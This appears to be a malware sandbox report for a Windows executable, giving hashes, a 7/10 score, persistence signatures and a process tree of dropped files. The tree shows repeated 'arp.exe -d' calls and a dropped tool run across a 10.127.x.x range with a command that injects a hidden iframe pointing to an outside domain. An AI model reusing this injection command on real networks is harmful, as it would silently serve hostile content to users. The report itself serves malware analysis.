Overview

overview

7

Static

static

3

00898cd380...18.exe

windows7-x64

7

00898cd380...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    147s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    19/06/2024, 21:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00898cd38001d7a732d9ae416902a970_JaffaCakes118.exe

  • Size

    327KB

  • MD5

    00898cd38001d7a732d9ae416902a970

  • SHA1

    40f5cc2415e4a6b51520ba48f382df305acbb0cc

  • SHA256

    3485d5e183e990ee8d65a2ca1c4baff6a6852216d9c7e437b608e3a80cc356da

  • SHA512

    46c2c2e01e1e4167ffcc4ad0f141749c53874a341a98c0c47f5313efbff347072ba5e2dcae6eb093c94c5ce52da8158548966746d380b589ddc1f8c9ae590b70

  • SSDEEP

    6144:5+Avs+vFp0ScplzFxpl7KZV266PR9Wvn78GKZs3KzEWcKfFrl2t+mDibYGgT0:ZsCTVaFxph6EqfdKZkKlcKNl2t+mGb/3

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00898cd38001d7a732d9ae416902a970_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\00898cd38001d7a732d9ae416902a970_JaffaCakes118.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Users\Admin\AppData\Local\Temp\motou.exe
      motou.exe
      2⤵
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Users\Admin\AppData\Local\Temp\smss.com
        C:\Users\Admin\AppData\Local\Temp\smss.com
        3⤵
        • Executes dropped EXE
        PID:2328
      • C:\Windows\SysWOW64\arp.exe
        arp.exe -d
        3⤵
          PID:2708
        • C:\Windows\SysWOW64\arp.exe
          arp.exe -d
          3⤵
            PID:3000
          • C:\Windows\SysWOW64\arp.exe
            arp.exe -d
            3⤵
              PID:2720
            • C:\Windows\SysWOW64\arp.exe
              arp.exe -d
              3⤵
                PID:2724
              • C:\Windows\SysWOW64\arp.exe
                arp.exe -d
                3⤵
                  PID:2776
                • C:\Windows\SysWOW64\arp.exe
                  arp.exe -d
                  3⤵
                    PID:2640
                  • C:\Windows\SysWOW64\arp.exe
                    arp.exe -d
                    3⤵
                      PID:2976
                    • C:\Windows\SysWOW64\arp.exe
                      arp.exe -d
                      3⤵
                        PID:2572
                      • C:\Windows\SysWOW64\arp.exe
                        arp.exe -d
                        3⤵
                          PID:2536
                        • C:\Users\Admin\AppData\Local\Temp\smss.com
                          C:\Users\Admin\AppData\Local\Temp\smss.com -idx 0 -ip 10.127.0.2-10.127.255.253 -reset
                          3⤵
                          • Executes dropped EXE
                          PID:2544
                        • C:\Users\Admin\AppData\Local\Temp\smss.com
                          C:\Users\Admin\AppData\Local\Temp\smss.com -idx 0 -ip 10.127.0.2-10.127.255.253 -port 80 -insert "<iframe src=http://9gg.biz/ width=0 height=0 frameborder=0></iframe>"
                          3⤵
                          • Executes dropped EXE
                          PID:2936
                        • C:\Windows\SysWOW64\arp.exe
                          arp.exe -d
                          3⤵
                            PID:1052
                          • C:\Windows\SysWOW64\arp.exe
                            arp.exe -d
                            3⤵
                              PID:1028
                            • C:\Windows\SysWOW64\arp.exe
                              arp.exe -d
                              3⤵
                                PID:2376
                              • C:\Windows\SysWOW64\arp.exe
                                arp.exe -d
                                3⤵
                                  PID:316
                                • C:\Windows\SysWOW64\arp.exe
                                  arp.exe -d
                                  3⤵
                                    PID:1652
                                  • C:\Windows\SysWOW64\arp.exe
                                    arp.exe -d
                                    3⤵
                                      PID:2336
                                    • C:\Windows\SysWOW64\arp.exe
                                      arp.exe -d
                                      3⤵
                                        PID:1252
                                      • C:\Windows\SysWOW64\arp.exe
                                        arp.exe -d
                                        3⤵
                                          PID:1100
                                        • C:\Windows\SysWOW64\arp.exe
                                          arp.exe -d
                                          3⤵
                                            PID:3052
                                          • C:\Windows\SysWOW64\arp.exe
                                            arp.exe -d
                                            3⤵
                                              PID:2272
                                            • C:\Windows\SysWOW64\arp.exe
                                              arp.exe -d
                                              3⤵
                                                PID:536
                                              • C:\Windows\SysWOW64\arp.exe
                                                arp.exe -d
                                                3⤵
                                                  PID:804
                                                • C:\Windows\SysWOW64\arp.exe
                                                  arp.exe -d
                                                  3⤵
                                                    PID:1500
                                                  • C:\Windows\SysWOW64\arp.exe
                                                    arp.exe -d
                                                    3⤵
                                                      PID:1864
                                                    • C:\Windows\SysWOW64\arp.exe
                                                      arp.exe -d
                                                      3⤵
                                                        PID:1096
                                                      • C:\Windows\SysWOW64\arp.exe
                                                        arp.exe -d
                                                        3⤵
                                                          PID:2248
                                                        • C:\Windows\SysWOW64\arp.exe
                                                          arp.exe -d
                                                          3⤵
                                                            PID:1032
                                                          • C:\Windows\SysWOW64\arp.exe
                                                            arp.exe -d
                                                            3⤵
                                                              PID:876
                                                            • C:\Windows\SysWOW64\arp.exe
                                                              arp.exe -d
                                                              3⤵
                                                                PID:1796
                                                              • C:\Windows\SysWOW64\arp.exe
                                                                arp.exe -d
                                                                3⤵
                                                                  PID:964
                                                                • C:\Windows\SysWOW64\arp.exe
                                                                  arp.exe -d
                                                                  3⤵
                                                                    PID:296
                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                    arp.exe -d
                                                                    3⤵
                                                                      PID:872
                                                                    • C:\Windows\SysWOW64\arp.exe
                                                                      arp.exe -d
                                                                      3⤵
                                                                        PID:1136
                                                                      • C:\Windows\SysWOW64\arp.exe
                                                                        arp.exe -d
                                                                        3⤵
                                                                          PID:2868
                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                          arp.exe -d
                                                                          3⤵
                                                                            PID:2436
                                                                          • C:\Windows\SysWOW64\arp.exe
                                                                            arp.exe -d
                                                                            3⤵
                                                                              PID:1512
                                                                            • C:\Windows\SysWOW64\arp.exe
                                                                              arp.exe -d
                                                                              3⤵
                                                                                PID:2144
                                                                              • C:\Windows\SysWOW64\arp.exe
                                                                                arp.exe -d
                                                                                3⤵
                                                                                  PID:2984
                                                                                • C:\Windows\SysWOW64\arp.exe
                                                                                  arp.exe -d
                                                                                  3⤵
                                                                                    PID:2064
                                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                                    arp.exe -d
                                                                                    3⤵
                                                                                      PID:1696
                                                                                    • C:\Windows\SysWOW64\arp.exe
                                                                                      arp.exe -d
                                                                                      3⤵
                                                                                        PID:1996
                                                                                      • C:\Windows\SysWOW64\arp.exe
                                                                                        arp.exe -d
                                                                                        3⤵
                                                                                          PID:2708
                                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                                          arp.exe -d
                                                                                          3⤵
                                                                                            PID:2880
                                                                                          • C:\Windows\SysWOW64\arp.exe
                                                                                            arp.exe -d
                                                                                            3⤵
                                                                                              PID:2668
                                                                                            • C:\Windows\SysWOW64\arp.exe
                                                                                              arp.exe -d
                                                                                              3⤵
                                                                                                PID:2732
                                                                                              • C:\Windows\SysWOW64\arp.exe
                                                                                                arp.exe -d
                                                                                                3⤵
                                                                                                  PID:2676
                                                                                                • C:\Windows\SysWOW64\arp.exe
                                                                                                  arp.exe -d
                                                                                                  3⤵
                                                                                                    PID:2860
                                                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                                                    arp.exe -d
                                                                                                    3⤵
                                                                                                      PID:2560
                                                                                                    • C:\Windows\SysWOW64\arp.exe
                                                                                                      arp.exe -d
                                                                                                      3⤵
                                                                                                        PID:2612
                                                                                                      • C:\Windows\SysWOW64\arp.exe
                                                                                                        arp.exe -d
                                                                                                        3⤵
                                                                                                          PID:2692
                                                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                                                          arp.exe -d
                                                                                                          3⤵
                                                                                                            PID:2588

                                                                                                      Network

                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\smss.com
                                                                                                        Filesize

                                                                                                        10KB

                                                                                                        MD5

                                                                                                        f8875f29c07882b3b269e8da3d57551a

                                                                                                        SHA1

                                                                                                        9fb0a1e6828add0af71b46c107b3aa2c5692e023

                                                                                                        SHA256

                                                                                                        d242fd244935d84ff562a8d64189e373a8b1015b394e5bf6508f62053158c066

                                                                                                        SHA512

                                                                                                        a98abc754bd58d707070c90ed01c2f04bba206588203f5fbc37a631225b01390c14c5f10021a9ec01f3424b13202692656352c2a6eac264eddb0c3c6eeb14ff7

                                                                                                        Download Submit

                                                                                                      • memory/1820-3-0x0000000000400000-0x00000000004F7000-memory.dmp

                                                                                                        Filesize

                                                                                                        988KB

                                                                                                        Download

                                                                                                      • memory/1820-4-0x0000000000220000-0x0000000000221000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1820-18-0x0000000000400000-0x00000000004F7000-memory.dmp

                                                                                                        Filesize

                                                                                                        988KB

                                                                                                        Download

                                                                                                      • memory/2232-0-0x0000000000400000-0x00000000004F7000-memory.dmp

                                                                                                        Filesize

                                                                                                        988KB

                                                                                                        Download

                                                                                                      • memory/2232-1-0x0000000000220000-0x0000000000221000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2232-2-0x0000000003450000-0x0000000003547000-memory.dmp

                                                                                                        Filesize

                                                                                                        988KB

                                                                                                        Download

                                                                                                      • memory/2232-17-0x0000000000400000-0x00000000004F7000-memory.dmp

                                                                                                        Filesize

                                                                                                        988KB

                                                                                                        Download

                                                                                                      • memory/2328-16-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                        Filesize

                                                                                                        48KB

                                                                                                        Download

                                                                                                      • memory/2544-33-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                        Filesize

                                                                                                        48KB

                                                                                                        Download

                                                                                                      • memory/2936-34-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                        Filesize

                                                                                                        48KB

                                                                                                        Download